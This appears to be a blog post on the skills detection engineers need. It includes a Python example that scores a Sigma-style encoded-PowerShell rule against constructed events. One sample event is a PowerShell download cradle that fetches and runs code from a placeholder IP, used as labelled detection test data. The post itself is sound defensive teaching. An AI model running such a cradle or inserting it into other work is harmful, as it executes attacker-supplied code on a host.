Detection Engineering as a discipline has gained a lot of traction in recent years.
What used to be part of the job for an incident responder, DART (Detection and Response Team) member, or threat researcher is now a full-blown career path of its own. As the complexity and frequency of cyber threats increase, so does the demand for specialized roles to combat them.
Detection Engineering plays a crucial role in identifying and later preventing security breaches in organizations.
But what exactly is this discipline and what skills does it require to succeed in this subfield of Cybersecurity?
Below is a general outline of what to look for.
In a nutshell, a detection is some kind of logic that produces an actionable finding, one that analysts or engineers can respond to. That logic can be expressed in many forms: KQL or SPL queries, Sigma rules (written in YAML), YARA rules, JSON-based rule formats used by many products, custom Python, and more.
A later post will be dedicated to the intricacies of detections and alerts.
For now, we can leave it at this: each detection is composed of logic, a crafted piece of code designed to match specific patterns or anomalies in the data that might indicate a security threat.
To become a Detection Engineer in the cybersecurity industry, you need to possess several essential skills.
The Essential Toolkit
Deep Understanding of Your Tools
These skills include a strong foundation in network security technologies, protocols, scripting, and tools such as Intrusion Detection Systems (IDS), Endpoint Detection and Response (EDR), and Security Information and Event Management (SIEM). This matters because the telemetry these tools produce is what the detection logic runs against: you need to know what each one logs, in what format, and what it does not log at all.
You should have a deep understanding of common attack methods, threat actors, and security best practices to detect and prevent security breaches.
Analytical
In addition, you need to be familiar with the techniques and methods used by attackers to gain unauthorized access to computer systems, networks, or data. Analytical skills are critical for working through large volumes of data and identifying potential threats, patterns, and suspicious activity.
Stats
Quantifying and measuring the effectiveness of your detection logic using statistical data about events and alerts is also important: how many alerts a rule fires, how many are confirmed true positives, how many are false positives, and what the rule misses. Being able to tell a story through that data can be huge when it comes to management and other stakeholders.
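The following Python is an added example, not code from the original post, that ties the two points together: a detection is logic evaluated over telemetry (the "detection is composed of logic" point above), and its output should be measured (the Stats point). It implements a small Sigma-style rule evaluator and runs an encoded-PowerShell rule over a handful of process-creation events, then scores the hits against analyst labels. Everything here is constructed for illustration: the rule, the events, the labels, and the use of CcmExec.exe as an allow-listed parent process are all assumptions, and the evaluator supports only a small subset of Sigma (the `contains`, `startswith` and `endswith` modifiers, the `|all` qualifier, and the conditions `selection` and `selection and not filter`).

```python
"""Sigma-style detection evaluated against constructed process-creation events.

Added example, not code from the original post. The rule layout mirrors the
Sigma `detection:` block (selection / filter maps plus a `condition` string),
but only a small subset of Sigma is implemented: the `contains`, `startswith`
and `endswith` modifiers, the `|all` qualifier, and the conditions
"selection" and "selection and not filter". Matching is case-insensitive,
as in Sigma. Events, labels and the allow-listed parent are constructed.
"""
from __future__ import annotations

from typing import Any

# Assumed rule: encoded PowerShell command line. CcmExec.exe is used here as an
# example of a deployment agent whose encoded commands are expected and excluded.
RULE: dict[str, Any] = {
    "title": "Encoded PowerShell Command Line (example)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["-enc", "-ec "],
        },
        "filter": {"ParentImage|endswith": "\\ccmexec.exe"},
        "condition": "selection and not filter",
    },
}

# Constructed events. `is_malicious` is the analyst's verdict and exists only
# so the rule can be measured; real telemetry does not carry it.
EVENTS: list[dict[str, Any]] = [
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgAIAAo...",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "is_malicious": True},
    {"id": 2, "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -enc aQBlAHgAIAAo...",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "is_malicious": True},
    {"id": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "is_malicious": False},
    {"id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc ZgB1AG4AYwB0AGkAbwBuAC...",
     "ParentImage": r"C:\Program Files\ConfigMgr\CcmExec.exe", "is_malicious": False},
    {"id": 5, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami",
     "ParentImage": r"C:\Windows\explorer.exe", "is_malicious": False},
    # Download cradle with no encoding: malicious, but outside this rule's logic
    # (a false negative that a second rule would need to cover).
    {"id": 6, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.5/a')\"",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "is_malicious": True},
    # Admin running their own encoded script interactively: a false positive.
    {"id": 7, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlAA==",
     "ParentImage": r"C:\Windows\explorer.exe", "is_malicious": False},
]


def _field_matches(value: Any, modifier: str | None, patterns: list[Any]) -> bool:
    """Apply one Sigma-style modifier; list values are ORed unless |all is set."""
    if value is None:
        return False
    v = str(value).lower()
    pats = [str(p).lower() for p in patterns]
    if not modifier:
        return v in pats
    name, _, qualifier = modifier.partition("|")
    if name == "contains":
        hits = [p in v for p in pats]
    elif name == "endswith":
        hits = [v.endswith(p) for p in pats]
    elif name == "startswith":
        hits = [v.startswith(p) for p in pats]
    else:
        raise ValueError(f"unsupported modifier: {modifier!r}")
    return all(hits) if qualifier == "all" else any(hits)


def _block_matches(event: dict[str, Any], block: dict[str, Any]) -> bool:
    """All fields inside a selection/filter map must match (Sigma AND semantics)."""
    for key, patterns in block.items():
        field, _, modifier = key.partition("|")
        pats = patterns if isinstance(patterns, list) else [patterns]
        if not _field_matches(event.get(field), modifier or None, pats):
            return False
    return True


def rule_matches(event: dict[str, Any], rule: dict[str, Any]) -> bool:
    det = rule["detection"]
    condition = det["condition"]
    if condition == "selection":
        return _block_matches(event, det["selection"])
    if condition == "selection and not filter":
        return _block_matches(event, det["selection"]) and not _block_matches(event, det["filter"])
    raise ValueError(f"unsupported condition: {condition!r}")


def run_detection(events: list[dict[str, Any]], rule: dict[str, Any]) -> list[int]:
    """Return the ids of events the rule fires on, in input order."""
    return [e["id"] for e in events if rule_matches(e, rule)]


def measure(events: list[dict[str, Any]], hits: list[int]) -> dict[str, float]:
    """Score hits against the analyst labels: counts plus precision and recall."""
    hit_ids = set(hits)
    tp = sum(1 for e in events if e["id"] in hit_ids and e["is_malicious"])
    fp = sum(1 for e in events if e["id"] in hit_ids and not e["is_malicious"])
    fn = sum(1 for e in events if e["id"] not in hit_ids and e["is_malicious"])
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return {"tp": tp, "fp": fp, "fn": fn, "precision": precision, "recall": recall}


if __name__ == "__main__":
    hits = run_detection(EVENTS, RULE)
    print(f"{RULE['title']}: fired on events {hits}")
    print(measure(EVENTS, hits))
```

On the constructed sample the rule fires on events 1, 2 and 7 and misses event 6, giving a precision and recall of 2/3 each. Those two numbers are the kind of statistic the section above is asking for: the false positive (event 7) tells you where the filter needs tuning, and the false negative (event 6) tells you the rule covers one technique and a separate rule is needed for download cradles that never use `-enc`.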
Problem Solving Skills
Problem-solving skills are essential for identifying and solving complex problems quickly and making decisions under pressure. For example, you may need to come up with a detection or alert for a newly reported threat, or find the root cause of a broken detection and implement the fix.
Finally, Detection Engineers must be proactive in seeking out new information and resources to improve their skills and knowledge as the world of cybersecurity is constantly evolving.
There are many posts that have covered this very topic, from defining the concept of Detection Engineering to lifecycles for implementing it.
Check out the following.
Understanding these skills will equip you with the tools needed to succeed in Detection Engineering.
I hope this helps you understand another domain within the umbrella that is Cybersecurity.
Is there a place for detection engineering only in information security companies, or should any company be looking into this as well?